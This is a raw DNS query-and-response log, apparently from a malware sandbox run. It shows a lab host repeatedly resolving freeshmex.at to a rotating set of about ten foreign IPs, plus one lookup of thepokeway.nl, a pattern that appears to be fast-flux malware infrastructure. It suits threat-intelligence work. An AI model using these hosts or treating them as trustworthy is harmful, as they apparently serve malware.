              Nov 24, 2022 20:13:29.193562984 CET192.168.2.48.8.8.80xf846Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:29.630523920 CET192.168.2.48.8.8.80x6a41Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:30.759373903 CET192.168.2.48.8.8.80x76faStandard query (0)freeshmex.atA (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:32.005364895 CET192.168.2.48.8.8.80xfed9Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:33.404093981 CET192.168.2.48.8.8.80x8cadStandard query (0)freeshmex.atA (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:33.718513012 CET192.168.2.48.8.8.80xddb5Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:34.239005089 CET192.168.2.48.8.8.80xe7fcStandard query (0)freeshmex.atA (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:34.651309013 CET192.168.2.48.8.8.80xc9b3Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:35.423708916 CET192.168.2.48.8.8.80x5996Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:37.516464949 CET192.168.2.48.8.8.80xd9bbStandard query (0)freeshmex.atA (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:38.002130032 CET192.168.2.48.8.8.80xbba5Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:39.548868895 CET192.168.2.48.8.8.80x99a5Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:39.808876991 CET192.168.2.48.8.8.80xbafcStandard query (0)freeshmex.atA (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:40.208877087 CET192.168.2.48.8.8.80xe142Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:41.303160906 CET192.168.2.48.8.8.80xf858Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Nov 24, 2022 20:13:00.175766945 CET8.8.8.8192.168.2.40x5b1bNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:00.175766945 CET8.8.8.8192.168.2.40x5b1bNo error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:00.175766945 CET8.8.8.8192.168.2.40x5b1bNo error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:00.175766945 CET8.8.8.8192.168.2.40x5b1bNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:00.175766945 CET8.8.8.8192.168.2.40x5b1bNo error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:00.175766945 CET8.8.8.8192.168.2.40x5b1bNo error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:00.175766945 CET8.8.8.8192.168.2.40x5b1bNo error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:00.175766945 CET8.8.8.8192.168.2.40x5b1bNo error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:00.175766945 CET8.8.8.8192.168.2.40x5b1bNo error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:00.175766945 CET8.8.8.8192.168.2.40x5b1bNo error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:01.502526999 CET8.8.8.8192.168.2.40xa72eNo error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:01.502526999 CET8.8.8.8192.168.2.40xa72eNo error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:01.502526999 CET8.8.8.8192.168.2.40xa72eNo error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:01.502526999 CET8.8.8.8192.168.2.40xa72eNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:01.502526999 CET8.8.8.8192.168.2.40xa72eNo error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:01.502526999 CET8.8.8.8192.168.2.40xa72eNo error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:01.502526999 CET8.8.8.8192.168.2.40xa72eNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:01.502526999 CET8.8.8.8192.168.2.40xa72eNo error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:01.502526999 CET8.8.8.8192.168.2.40xa72eNo error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:01.502526999 CET8.8.8.8192.168.2.40xa72eNo error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:04.211875916 CET8.8.8.8192.168.2.40x268bNo error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:04.211875916 CET8.8.8.8192.168.2.40x268bNo error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:04.211875916 CET8.8.8.8192.168.2.40x268bNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:04.211875916 CET8.8.8.8192.168.2.40x268bNo error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:04.211875916 CET8.8.8.8192.168.2.40x268bNo error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:04.211875916 CET8.8.8.8192.168.2.40x268bNo error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:04.211875916 CET8.8.8.8192.168.2.40x268bNo error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:04.211875916 CET8.8.8.8192.168.2.40x268bNo error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:04.211875916 CET8.8.8.8192.168.2.40x268bNo error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:04.211875916 CET8.8.8.8192.168.2.40x268bNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:05.672918081 CET8.8.8.8192.168.2.40xe8d2No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:05.672918081 CET8.8.8.8192.168.2.40xe8d2No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:05.672918081 CET8.8.8.8192.168.2.40xe8d2No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:05.672918081 CET8.8.8.8192.168.2.40xe8d2No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:05.672918081 CET8.8.8.8192.168.2.40xe8d2No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:05.672918081 CET8.8.8.8192.168.2.40xe8d2No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:05.672918081 CET8.8.8.8192.168.2.40xe8d2No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:05.672918081 CET8.8.8.8192.168.2.40xe8d2No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:05.672918081 CET8.8.8.8192.168.2.40xe8d2No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:05.672918081 CET8.8.8.8192.168.2.40xe8d2No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:07.711612940 CET8.8.8.8192.168.2.40x2615No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:07.711612940 CET8.8.8.8192.168.2.40x2615No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:07.711612940 CET8.8.8.8192.168.2.40x2615No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:07.711612940 CET8.8.8.8192.168.2.40x2615No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:07.711612940 CET8.8.8.8192.168.2.40x2615No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:07.711612940 CET8.8.8.8192.168.2.40x2615No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:07.711612940 CET8.8.8.8192.168.2.40x2615No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:07.711612940 CET8.8.8.8192.168.2.40x2615No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:07.711612940 CET8.8.8.8192.168.2.40x2615No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:07.711612940 CET8.8.8.8192.168.2.40x2615No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:14.598026037 CET8.8.8.8192.168.2.40x4259No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:14.598026037 CET8.8.8.8192.168.2.40x4259No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:14.598026037 CET8.8.8.8192.168.2.40x4259No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:14.598026037 CET8.8.8.8192.168.2.40x4259No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:14.598026037 CET8.8.8.8192.168.2.40x4259No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:14.598026037 CET8.8.8.8192.168.2.40x4259No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:14.598026037 CET8.8.8.8192.168.2.40x4259No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:14.598026037 CET8.8.8.8192.168.2.40x4259No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:14.598026037 CET8.8.8.8192.168.2.40x4259No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:14.598026037 CET8.8.8.8192.168.2.40x4259No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:14.828412056 CET8.8.8.8192.168.2.40x451cNo error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:14.828412056 CET8.8.8.8192.168.2.40x451cNo error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:14.828412056 CET8.8.8.8192.168.2.40x451cNo error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:14.828412056 CET8.8.8.8192.168.2.40x451cNo error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:14.828412056 CET8.8.8.8192.168.2.40x451cNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:14.828412056 CET8.8.8.8192.168.2.40x451cNo error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:14.828412056 CET8.8.8.8192.168.2.40x451cNo error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:14.828412056 CET8.8.8.8192.168.2.40x451cNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:14.828412056 CET8.8.8.8192.168.2.40x451cNo error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:14.828412056 CET8.8.8.8192.168.2.40x451cNo error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:15.592614889 CET8.8.8.8192.168.2.40x6a0cNo error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:15.592614889 CET8.8.8.8192.168.2.40x6a0cNo error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:15.592614889 CET8.8.8.8192.168.2.40x6a0cNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:15.592614889 CET8.8.8.8192.168.2.40x6a0cNo error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:15.592614889 CET8.8.8.8192.168.2.40x6a0cNo error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:15.592614889 CET8.8.8.8192.168.2.40x6a0cNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:15.592614889 CET8.8.8.8192.168.2.40x6a0cNo error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:15.592614889 CET8.8.8.8192.168.2.40x6a0cNo error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:15.592614889 CET8.8.8.8192.168.2.40x6a0cNo error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:15.592614889 CET8.8.8.8192.168.2.40x6a0cNo error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:16.396440029 CET8.8.8.8192.168.2.40x90b5No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:16.396440029 CET8.8.8.8192.168.2.40x90b5No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:16.396440029 CET8.8.8.8192.168.2.40x90b5No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:16.396440029 CET8.8.8.8192.168.2.40x90b5No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:16.396440029 CET8.8.8.8192.168.2.40x90b5No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:16.396440029 CET8.8.8.8192.168.2.40x90b5No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:16.396440029 CET8.8.8.8192.168.2.40x90b5No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:16.396440029 CET8.8.8.8192.168.2.40x90b5No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:16.396440029 CET8.8.8.8192.168.2.40x90b5No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:16.396440029 CET8.8.8.8192.168.2.40x90b5No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:18.721328974 CET8.8.8.8192.168.2.40x5229No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:18.721328974 CET8.8.8.8192.168.2.40x5229No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:18.721328974 CET8.8.8.8192.168.2.40x5229No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:18.721328974 CET8.8.8.8192.168.2.40x5229No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:18.721328974 CET8.8.8.8192.168.2.40x5229No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:18.721328974 CET8.8.8.8192.168.2.40x5229No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:18.721328974 CET8.8.8.8192.168.2.40x5229No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:18.721328974 CET8.8.8.8192.168.2.40x5229No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:18.721328974 CET8.8.8.8192.168.2.40x5229No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:18.721328974 CET8.8.8.8192.168.2.40x5229No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:20.254560947 CET8.8.8.8192.168.2.40x534eNo error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:20.254560947 CET8.8.8.8192.168.2.40x534eNo error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:20.254560947 CET8.8.8.8192.168.2.40x534eNo error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:20.254560947 CET8.8.8.8192.168.2.40x534eNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:20.254560947 CET8.8.8.8192.168.2.40x534eNo error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:20.254560947 CET8.8.8.8192.168.2.40x534eNo error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:20.254560947 CET8.8.8.8192.168.2.40x534eNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:20.254560947 CET8.8.8.8192.168.2.40x534eNo error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:20.254560947 CET8.8.8.8192.168.2.40x534eNo error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:20.254560947 CET8.8.8.8192.168.2.40x534eNo error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:21.614191055 CET8.8.8.8192.168.2.40x9b24No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:21.614191055 CET8.8.8.8192.168.2.40x9b24No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:21.614191055 CET8.8.8.8192.168.2.40x9b24No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:21.614191055 CET8.8.8.8192.168.2.40x9b24No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:21.614191055 CET8.8.8.8192.168.2.40x9b24No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:21.614191055 CET8.8.8.8192.168.2.40x9b24No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:21.614191055 CET8.8.8.8192.168.2.40x9b24No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:21.614191055 CET8.8.8.8192.168.2.40x9b24No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:21.614191055 CET8.8.8.8192.168.2.40x9b24No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:21.614191055 CET8.8.8.8192.168.2.40x9b24No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:21.932231903 CET8.8.8.8192.168.2.40x1f86No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:21.932231903 CET8.8.8.8192.168.2.40x1f86No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:21.932231903 CET8.8.8.8192.168.2.40x1f86No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:21.932231903 CET8.8.8.8192.168.2.40x1f86No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:21.932231903 CET8.8.8.8192.168.2.40x1f86No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:21.932231903 CET8.8.8.8192.168.2.40x1f86No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:21.932231903 CET8.8.8.8192.168.2.40x1f86No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:21.932231903 CET8.8.8.8192.168.2.40x1f86No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:21.932231903 CET8.8.8.8192.168.2.40x1f86No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:21.932231903 CET8.8.8.8192.168.2.40x1f86No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:22.264146090 CET8.8.8.8192.168.2.40xb6d9No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:22.264146090 CET8.8.8.8192.168.2.40xb6d9No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:22.264146090 CET8.8.8.8192.168.2.40xb6d9No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:22.264146090 CET8.8.8.8192.168.2.40xb6d9No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:22.264146090 CET8.8.8.8192.168.2.40xb6d9No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:22.264146090 CET8.8.8.8192.168.2.40xb6d9No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:22.264146090 CET8.8.8.8192.168.2.40xb6d9No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:22.264146090 CET8.8.8.8192.168.2.40xb6d9No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:22.264146090 CET8.8.8.8192.168.2.40xb6d9No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:22.264146090 CET8.8.8.8192.168.2.40xb6d9No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:23.853676081 CET8.8.8.8192.168.2.40xd330No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:23.853676081 CET8.8.8.8192.168.2.40xd330No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:23.853676081 CET8.8.8.8192.168.2.40xd330No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:23.853676081 CET8.8.8.8192.168.2.40xd330No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:23.853676081 CET8.8.8.8192.168.2.40xd330No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:23.853676081 CET8.8.8.8192.168.2.40xd330No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:23.853676081 CET8.8.8.8192.168.2.40xd330No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:23.853676081 CET8.8.8.8192.168.2.40xd330No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:23.853676081 CET8.8.8.8192.168.2.40xd330No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:23.853676081 CET8.8.8.8192.168.2.40xd330No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:25.443180084 CET8.8.8.8192.168.2.40xd930No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:25.443180084 CET8.8.8.8192.168.2.40xd930No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:25.443180084 CET8.8.8.8192.168.2.40xd930No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:25.443180084 CET8.8.8.8192.168.2.40xd930No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:25.443180084 CET8.8.8.8192.168.2.40xd930No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:25.443180084 CET8.8.8.8192.168.2.40xd930No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:25.443180084 CET8.8.8.8192.168.2.40xd930No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:25.443180084 CET8.8.8.8192.168.2.40xd930No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:25.443180084 CET8.8.8.8192.168.2.40xd930No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:25.443180084 CET8.8.8.8192.168.2.40xd930No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:25.852006912 CET8.8.8.8192.168.2.40x5c52No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:25.852006912 CET8.8.8.8192.168.2.40x5c52No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:25.852006912 CET8.8.8.8192.168.2.40x5c52No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:25.852006912 CET8.8.8.8192.168.2.40x5c52No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:25.852006912 CET8.8.8.8192.168.2.40x5c52No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:25.852006912 CET8.8.8.8192.168.2.40x5c52No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:25.852006912 CET8.8.8.8192.168.2.40x5c52No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:25.852006912 CET8.8.8.8192.168.2.40x5c52No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:25.852006912 CET8.8.8.8192.168.2.40x5c52No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:25.852006912 CET8.8.8.8192.168.2.40x5c52No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:26.163016081 CET8.8.8.8192.168.2.40x2242No error (0)thepokeway.nl5.135.247.111A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:27.585237026 CET8.8.8.8192.168.2.40x9072No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:27.585237026 CET8.8.8.8192.168.2.40x9072No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:27.585237026 CET8.8.8.8192.168.2.40x9072No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:27.585237026 CET8.8.8.8192.168.2.40x9072No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:27.585237026 CET8.8.8.8192.168.2.40x9072No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:27.585237026 CET8.8.8.8192.168.2.40x9072No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:27.585237026 CET8.8.8.8192.168.2.40x9072No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:27.585237026 CET8.8.8.8192.168.2.40x9072No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:27.585237026 CET8.8.8.8192.168.2.40x9072No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:27.585237026 CET8.8.8.8192.168.2.40x9072No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
              Nov 24, 2022 20:13:27.964770079 CET8.8.8.8192.168.2.40x2c30No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
